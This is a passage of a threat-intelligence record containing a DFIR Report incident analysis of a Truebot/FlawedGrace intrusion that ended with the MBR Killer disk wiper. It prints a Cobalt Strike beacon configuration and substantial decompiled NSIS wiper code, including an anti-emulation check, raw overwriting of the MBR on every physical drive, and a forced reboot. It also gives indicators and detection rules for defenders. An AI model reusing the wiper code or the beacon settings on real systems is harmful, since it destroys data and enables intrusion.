[\r\n \"print\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/submit.php\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"VirtualAllocEx\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 0,\r\n \"startrwx\": true,\r\n \"stub\": \"ezN0tALmJbn0hY8yMkftaA==\",\r\n
\"transform-x86\": null,\r\n \"transform-x64\": null,\r\n \"userwx\": true\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": false\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nTwo settings in this profile matter for detection: sleeptime is 60000 ms with jitter 0, so the beacon checks in at an exact 60-second cadence that stands out in flow data, and the /ga.js GET and /submit.php POST URIs are stock Cobalt Strike Malleable C2 defaults.\r\nExfiltration\r\nOn the second day of the intrusion, a file server began connecting to 139.60.160[.]166 over TCP port 4433. The\r\nprocess tree indicates the FlawedGrace malware injected into svchost and msiexec on the file server and initiated the\r\ntransfer. Other reports have indicated that Truebot/FlawedGrace intrusions deployed custom tools for exfiltration. We did\r\nnot observe any additional binary dropped to disk to perform the exfiltration. As the FlawedGrace process established the\r\nTCP connection, we assess with moderate confidence that the capability is included in the FlawedGrace malware itself.\r\nTwo distinct exfiltration periods were observed, around two hours apart.\r\nThe traffic was not wrapped in TLS but sent directly over TCP.\r\nThe payload was nevertheless not readable as plain text, indicating the malware applies its own obfuscation or encryption.\r\n
Using flow data\r\nfor the two sessions, we were able to verify that gigabytes of data were exfiltrated.\r\nImpact\r\nWithin four hours of the completed exfiltration, and only 29 hours after initial execution, the threat actors started deploying\r\nMBR Killer (aka KillDisk), well-known for its use in the 2018 Banco de Chile attack. As documented by Flashpoint,\r\nthe wiper is an NSIS (Nullsoft Scriptable Install System) script capable of wiping a device’s MBR (Master Boot Record),\r\nMFT (Master File Table), VBR (Volume Boot Record) and EBR (Extended Boot Record) before forcing a reboot to render the\r\ndevice inoperable. During this destructive stage, the threat actors named the file C:\\ProgramData\\chrome.exe on the\r\nbeachhead, while on other servers the C:\\Windows\\Temp\\[0-9a-f]{32}.exe naming pattern was used.\r\nAs a defense-evasion technique, MBR Killer has been observed using patched NSIS installers relying on non-standard\r\nheaders, so that off-the-shelf NSIS extractors do not recognise the file as an NSIS installer.\r\n
Once the payload signature is corrected, NSIS decompilers such as 7-Zip (versions 9.34 to 15.05; later releases dropped NSIS script decompilation) are able to extract the\r\nmalicious NSIS script.\r\nOrigin Hexadecimal Signature\r\nNSIS Specification EF BE AD DE 4E 75 6C 6C 73 6F 66 74 49 6E 73 74\r\nThe DFIR Report’s MBR Killer EF BE AD DE 4E 75 6C 6C 73 6F 66 74 49 90 73 74\r\nBanco de Chile’s MBR Killer EF BE AD DE 4E 75 6C 6C 73 6F 66 74 49 6E 73 85\r\nThe standard signature is the DEADBEEF marker followed by the ASCII string NullsoftInst; each variant corrupts a single byte of that string (6E to 90 and 74 to 85 respectively), which is enough to stop unpatched extractors from recognising the file. This customization provides defenders with a detection opportunity, as outlined in the YARA rules linked under Detections below.\r\nDuring initialization, MBR Killer visually hides itself by moving its window off-screen.\r\nFunction .onGUIInit\r\n System::Call \"User32::SetWindowPos(i, i, i, i, i, i, i) i ($HWNDPARENT, 0, -10000, -10000, 0, 0, 0x0200|0x00\r\nFunctionEnd\r\nOnce hidden, the malicious installer checks whether it is being emulated by temporarily patching the native Windows\r\nZwClose function (exported by ntdll.dll) to return STATUS_SUCCESS immediately, closing a dummy handle\r\nthrough kernel32::CloseHandle(0x12345678) and validating that, although the handle was invalid, the CloseHandle call\r\nsucceeded.\r\nSystem::Call \"kernel32::GetModuleHandle(t) p ('ntdll.dll') .r0\"\r\nIntCmp $0 0 label_exit\r\nSystem::Call \"kernel32::GetProcAddress(p, t) p (r0, 'ZwClose') .r1\"\r\nIntCmp $1 0 label_exit\r\nSystem::Call \"kernel32::VirtualProtect(p, i, i, *i) i (r1, 6, 0x40, .r2) .r0\"\r\nIntCmp $0 0 label_exit\r\nSystem::Alloc 6\r\nPop $3\r\nSystem::Call \"ntdll::memcpy(p, p ,i) i (r3, r1, 6)\"\r\nSystem::Call \"ntdll::memcpy(p, t, i) i (r1, t '1ÀYZÿá', 6)\"\r\nSystem::Call \"kernel32::CloseHandle(i) i (0x12345678) .r4\"\r\nSystem::Call \"ntdll::memcpy(p, p, i) i (r1, r3, 6)\"\r\nIntCmp $4 1 0 label_exit label_exit\r\nThe six patch bytes written by the second memcpy, '1ÀYZÿá', are the x86 instructions 31 C0 59 5A FF E1 (xor eax,eax; pop ecx; pop edx; jmp ecx): they set the return value to 0 (STATUS_SUCCESS), discard the single stdcall argument and jump back to the caller without ever issuing the system call. On a real Windows host the patched stub is executed and CloseHandle returns 1, so the script continues; an emulator that implements CloseHandle internally instead of running the ntdll code returns 0 for the bogus handle, and the final IntCmp then jumps to label_exit, skipping the wiping routine and going straight to the reboot logic.\r\nIf the anti-analysis check succeeds, the script issues the HideWindow NSIS call, which hides the installer, and proceeds to\r\nvalidate the existence of the first physical drive \\\\.\\PHYSICALDRIVE0 by opening 
it.\r\nFunction func_open_physicaldrive\r\n IntFmt $1 \\\\.\\PHYSICALDRIVE%d $0\r\n Push $0\r\n StrCpy $0 $1\r\n System::Call \"Kernel32::CreateFile(t, i, i, i, i, i, i) i ('$0', 0x80000000|0x40000000, 0x1|0x2, 0, 3, 0x80\r\n Pop $0\r\nFunctionEnd\r\nThe drive is opened with GENERIC_READ|GENERIC_WRITE access (0x80000000|0x40000000), shared read and write (0x1|0x2) and OPEN_EXISTING (3). Raw write access to a physical drive requires administrative privileges; whenever CreateFile fails and returns INVALID_HANDLE_VALUE (-1), the loop below exits, so a failure on the first drive means nothing is wiped at all.\r\nOnce \\\\.\\PHYSICALDRIVE0 has been opened, MBR Killer reads its first 512-byte sector and conditionally attempts to wipe:\r\nMFT (Master File Table): contains metadata about files and directories, such as names, dates and sizes.\r\nVBR (Volume Boot Record): contains, amongst other things, the code required to bootstrap the operating system.\r\nEBR (Extended Boot Record): contains the information describing logical partitions.\r\nMBR Killer then wipes the MBR (Master Boot Record) three times by writing 512 zero bytes at offset 0, flushing the buffers after each write, and\r\nrepeats the procedure on the next disk (\\\\.\\PHYSICALDRIVE1, \\\\.\\PHYSICALDRIVE2, …) until a drive can no longer be opened.\r\nlabel_check_physicaldrive:\r\n Call func_open_physicaldrive\r\n IntCmp $2 -1 label_goto_exit\r\n System::Call \"kernel32::SetFilePointer(i, i ,i ,i) i (r2, 0, 0, 0) .r3\"\r\n IntCmp $3 -1 label_close_physicaldrive\r\n System::Alloc 4\r\n Pop $3\r\n System::Call \"kernel32::ReadFile(i, i, i, p, i) i (r2, r9, 512, r3, 0) .r4\"\r\n System::Free $3\r\n IntCmp $4 1 0 label_close_physicaldrive label_close_physicaldrive\r\n Push $0\r\n Push $2\r\n Push $9\r\n Push $2\r\n Push $9\r\n Call func_wipe_mft_vbr__ebr\r\n Pop $9\r\n Pop $2\r\n Pop $0\r\n System::Alloc 512\r\n Pop $5\r\n System::Alloc 4\r\n Pop $6\r\n StrCpy $7 1\r\n Goto label_wipe\r\nlabel_next_wipe:\r\n IntOp $7 $7 + 1\r\nlabel_wipe:\r\n IntCmp $7 3 0 0 label_free_wipe\r\n System::Call \"kernel32::SetFilePointer(i, i ,i ,i) i (r2, 0, 0, 0) .r3\"\r\n IntCmp $3 -1 label_goto_next_wipe\r\n System::Call \"kernel32::WriteFile(i, i, i, p, i) i (r2, r5, 512, r6, 0)\"\r\n System::Call \"kernel32::FlushFileBuffers(i) i (r2)\"\r\nlabel_goto_next_wipe:\r\n Goto 
label_next_wipe\r\nlabel_free_wipe:\r\n System::Free $6\r\n System::Free $5\r\nlabel_close_physicaldrive:\r\n System::Call \"kernel32::CloseHandle(i) i (r2)\"\r\n Goto label_next_physicaldrive\r\nlabel_goto_exit:\r\n Goto label_exit\r\nlabel_next_physicaldrive:\r\n IntOp $0 $0 + 1\r\n Goto label_check_physicaldrive\r\nOnce the MBR Killer wiper has done its damage, the script attempts to adjust its process token to enable\r\nSeShutdownPrivilege and initiates a reboot. The token is opened with TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES (0x0008|0x0020), and the structure built inline is a TOKEN_PRIVILEGES with a single entry whose attribute is SE_PRIVILEGE_ENABLED (0x2). Every failure path still falls through to func_shutdown; without the privilege, ExitWindowsEx fails and the machine keeps running on its wiped disks until the next reboot.\r\nlabel_exit:\r\n StrCpy $1 0\r\n System::Call \"advapi32::OpenProcessToken(i, i, *i) i (-1, 0x0008|0x0020, .r1) i .r0\"\r\n StrCmp $0 0 label_shutdown\r\n System::Call \"advapi32::LookupPrivilegeValue(t, t, *l) i (n, 'SeShutdownPrivilege', .r2r2) i .r0\"\r\n StrCmp $0 0 label_close_process\r\n System::Call \"*(i 1, l r2, i 0x00000002) i .r0\"\r\n System::Call \"advapi32::AdjustTokenPrivileges(i, i, i, i, i, i) i (r1, 0, r0, 0, 0, 0)\"\r\n System::Free $0\r\nlabel_close_process:\r\n System::Call \"kernel32::CloseHandle(i) i (r1)\"\r\nlabel_shutdown:\r\n Call func_shutdown\r\nTo initiate the reboot, MBR Killer calls ExitWindowsEx with:\r\nEWX_REBOOT (0x2) to reboot rather than shut down\r\nEWX_FORCE (0x4) to terminate running processes without giving them a chance to save their state\r\nSHTDN_REASON_MAJOR_SOFTWARE (0x00030000) to record a software-initiated shutdown\r\nSHTDN_REASON_MINOR_UPGRADE (0x00000003) to record an upgrade as the minor reason.\r\nFunction func_shutdown\r\n Push $1\r\n StrCpy $1 0x2|0x4\r\n System::Call \"user32::ExitWindowsEx(i, i) i ($1, 0x00030000|0x00000003) i .r0\"\r\n Pop $1\r\nFunctionEnd\r\nWorth noting is that, even though the MBR Killer script reboots through an explicit ExitWindowsEx call, the same functionality is available natively within the\r\nNSIS installer itself (the Reboot instruction).\r\n
Upon reboot, the affected machines were rendered inoperable.\r\nWhile the wiper we observed was not packed with VMProtect, the decompiled script is nearly identical to the 2018 Banco de\r\nChile wiper component, indicating the source code was likely shared.\r\nSupporting this theory is the change in NSIS version from v3.0b2 (released on August 4th, 2015) to v3.04 (released on\r\nDecember 15th, 2018) alongside the removal of the MBR Killer branding.\r\n-Name \"MBR Killer\"\r\n-BrandingText \"Nullsoft Install System v3.0b2\"\r\n+Name Name\r\n+BrandingText \"Nullsoft Install System v3.04\"\r\nWhile the 2018 sample was bzip2-compressed, the recompiled version uses zlib, which is faster to decompress.\r\n-SetCompressor /SOLID bzip2\r\n+SetCompressor zlib\r\nFunctionality-wise, our newly observed wiper performs a forced reboot (EWX_REBOOT|EWX_FORCE, 0x2|0x4) with an explicit shutdown reason code, whereas the Banco de\r\nChile variant performed a forced power-off (EWX_POWEROFF|EWX_FORCE, 0x8|0x4) with no reason code.\r\n- StrCpy $1 0x8|0x4\r\n- System::Call \"user32::ExitWindowsEx(i, i) i ($1, 0) i .r0\"\r\n+ StrCpy $1 0x2|0x4\r\n+ System::Call \"user32::ExitWindowsEx(i, i) i ($1, 0x00030000|0x00000003) i .r0\"\r\nAs a hunting opportunity, we observed that NSIS executables (legitimate or not) automatically drop the %Temp%\\ns[a-zA-Z0-9]{5}.tmp\\System.dll library as part of the legitimate NSIS System plugin, which gives installer authors the ability to call any exported\r\nfunction from any DLL.\r\n
While not in itself indicative of malicious activity, we recommend threat hunters review the creation of the\r\nabove library to identify potentially undesirable installers within their environment; the hash of the legitimate System.dll is listed under Computed indicators below and can be used to find NSIS installers whose parent executable then deserves triage.\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nAtomic\r\n# Truebot\r\nessadonio[.]com / 45.182.189[.]71\r\n# Cobalt Strike\r\n5.188.206[.]78\r\n# FlawedGrace\r\n5.188.86[.]18\r\n81.19.135[.]30\r\n92.118.36[.]199\r\n# Exfiltration IP Address\r\n139.60.160[.]166\r\nComputed\r\n# Truebot\r\nName: Document_may_24_16654.exe\r\nSize: 10435552 bytes\r\nMD5: 6164e9d297d29aa8682971259da06848\r\nSHA1: 96b95edc1a917912a3181d5105fd5bfad1344de0\r\nSHA256: 717beedcd2431785a0f59d194e47970e9544fbf398d462a305f6ad9a1b1100cb\r\n# Truebot C2\r\nIP: 45.182.189[.]71\r\nJARM: 28d28d28d00028d00042d42d0000005a3e96c1dfa4bdb24b8b3c04cae18cc3\r\n# AdFind\r\nName: AdFind.exe\r\nSize: 1619968 bytes\r\nMD5: 12011c44955fd6631113f68a99447515\r\nSHA1: 4f4f8cf0f9b47d0ad95d159201fe7e72fbc8448d\r\nSHA256: c92c158d7c37fea795114fa6491fe5f145ad2f8c08776b18ae79db811e8e36a3\r\n# MBR Killer\r\nName: chrome.exe\r\nSize: 46698 bytes\r\nMD5: 2dc57a3836e4393d4d16c4eb04bf9c7e\r\nSHA1: c6a5b345cef4eb795866ba81dcac9bd933fdd86d\r\nSHA256: 121a1f64fff22c4bfcef3f11a23956ed403cdeb9bdb803f9c42763087bd6d94e\r\n# Legitimate NSIS System plugin\r\nName: System.dll\r\nMD5: fbe295e5a1acfbd0a6271898f885fe6a\r\nSHA1: d6d205922e61635472efb13c2bb92c9ac6cb96da\r\nSHA256: a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1\r\nDetections\r\nNetwork\r\nhttps://github.com/The-DFIR-Report/Suricata-Rules/blob/main/rules/truebot.rules\r\nETPRO MALWARE FlawedGrace CnC Activity M1\r\nETPRO MALWARE FlawedGrace CnC Activity M2\r\nET DROP Dshield Block Listed Source group 1\r\nET HUNTING Suspicious 
Empty SSL Certificate - Observed in Cobalt Strike\r\nET MALWARE Meterpreter or Other Reverse Shell SSL Cert\r\nThreatFox Cobalt Strike botnet C2 traffic (ip:port - confidence level: 100%)\r\nThreatFox Silence botnet C2 traffic (ip:port - confidence level: 75%)\r\nET POLICY Tunneled RDP msts Handshake\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nSigma\r\nDFIR Report Repository\r\nNullsoft Scriptable Installer Script (NSIS) execution: b95288d8-020a-4df0-95cb-d2d3a806ab11\r\nNullsoft Scriptable Installer Script (NSIS) execution: 221f15de-1cce-40b2-a766-2873938198c6\r\nViewing remote directories: bca1fab7-5640-489d-a161-e154fb6ba4f8\r\nList remote processes using tasklist: 80a56507-6778-4d04-8346-320a70358f2c\r\nFlawedGrace spawning threat injection target: 295e71e5-38c9-4a59-90dd-9fa7bf617b4b\r\nAdFind Discovery: 50046619-1037-49d7-91aa-54fc92923604\r\nSigma Repository\r\nCobaltStrike Named Pipe: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2\r\nCobaltStrike Service Installations – Security: d7a95147-145f-4678-b85d-d1ff4a3bb3f6\r\nSuspicious Group And Account Reconnaissance Activity Using Net.EXE: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0\r\nNet.exe Execution: 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac\r\nNew Process Created Via Wmic.EXE: 526be59f-a573-4eea-b5f7-f0973207634d\r\nSuspicious Scheduled Task Creation: 3a734d25-df5c-4b99-8034-af1ddb5883a4\r\nNew User Created Via Net.EXE: cd219ff3-fa99-45d4-8380-a7d15116c6dc\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/21619/21619.yar\r\nMITRE\r\nProcess Injection - T1055\r\nDisk Structure Wipe - T1561.002\r\nExfiltration Over Alternative Protocol - T1048\r\nMatch Legitimate Name or Location - T1036.005\r\nDisable or Modify Tools - T1562.001\r\nDeobfuscate/Decode Files or Information - T1140\r\nFileless Storage - 
T1027.011\r\nCommand Obfuscation - T1027.010\r\nScheduled Task - T1053.005\r\nPowerShell - T1059.001\r\nMalicious File - T1204.002\r\nWeb Protocols - T1071.001\r\nCustom Command and Control Protocol - T1094\r\nSystem Owner/User Discovery - T1033\r\nDomain Groups - T1069.002\r\nLocal Groups - T1069.001\r\nDomain Trust Discovery - T1482\r\nProcess Discovery - T1057\r\nDomain Account - T1087.002\r\nFile and Directory Discovery - T1083\r\nRemote System Discovery - T1018\r\nSecurity Software Discovery - T1518.001\r\nQuery Registry - T1012\r\nSMB/Windows Admin Shares - T1021.002\r\nLocal Data Staging - T1074.001\r\nLSASS Memory - T1003.001\r\nPass the Hash - T1550.002\r\nValid Accounts - T1078\r\nCreate or Modify System Process: Windows Service - T1543.003\r\nOS Credential Dumping: Security Account Manager - T1003.002\r\nSpearphishing Link - T1566.002\r\nInternal case #21619\r\nSource: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/"
	],
	"report_names": [
		"a-truly-graceful-wipe-out"
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c61fb5f8-fcd6-43e8-8b2d-4e81541589f7",
			"created_at": "2023-11-14T02:00:07.071699Z",
			"updated_at": "2026-04-10T02:00:03.440831Z",
			"deleted_at": null,
			"main_name": "DEV-0950",
			"aliases": [
				"Lace Tempest"
			],
			"source_name": "MISPGALAXY:DEV-0950",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6728f306-6259-4e7d-a4ea-59586d90a47d",
			"created_at": "2023-01-06T13:46:39.175292Z",
			"updated_at": "2026-04-10T02:00:03.236282Z",
			"deleted_at": null,
			"main_name": "FIN11",
			"aliases": [
				"TEMP.Warlock",
				"UNC902"
			],
			"source_name": "MISPGALAXY:FIN11",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e8ebcbda-e8df-4a38-a2a6-63b2608ee6f3",
			"created_at": "2023-01-06T13:46:38.88051Z",
			"updated_at": "2026-04-10T02:00:03.131218Z",
			"deleted_at": null,
			"main_name": "Silence group",
			"aliases": [
				"WHISPER SPIDER"
			],
			"source_name": "MISPGALAXY:Silence group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1db21349-11d6-4e57-805c-fb1e23a8acab",
			"created_at": "2022-10-25T16:07:23.630365Z",
			"updated_at": "2026-04-10T02:00:04.694622Z",
			"deleted_at": null,
			"main_name": "FIN11",
			"aliases": [
				"Chubby Scorpius",
				"DEV-0950",
				"Lace Tempest",
				"Operation Cyclone"
			],
			"source_name": "ETDA:FIN11",
			"tools": [
				"AZORult",
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"BLUESTEAL",
				"Cl0p",
				"EMASTEAL",
				"FLOWERPIPE",
				"FORKBEARD",
				"FRIENDSPEAK",
				"FlawedAmmyy",
				"GazGolder",
				"Get2",
				"GetandGo",
				"JESTBOT",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MINEDOOR",
				"MIXLABEL",
				"Meterpreter",
				"NAILGUN",
				"POPFLASH",
				"PuffStealer",
				"Rultazo",
				"SALTLICK",
				"SCRAPMINT",
				"SHORTBENCH",
				"SLOWROLL",
				"SPOONBEARD",
				"TiniMet",
				"TinyMet",
				"VIDAR",
				"Vidar Stealer"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434130,
	"ts_updated_at": 1775826694,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/64df87cac686a9d3f82ec3e06e6364718b9afeb1.pdf",
		"text": "https://archive.orkl.eu/64df87cac686a9d3f82ec3e06e6364718b9afeb1.txt",
		"img": "https://archive.orkl.eu/64df87cac686a9d3f82ec3e06e6364718b9afeb1.jpg"
	}
}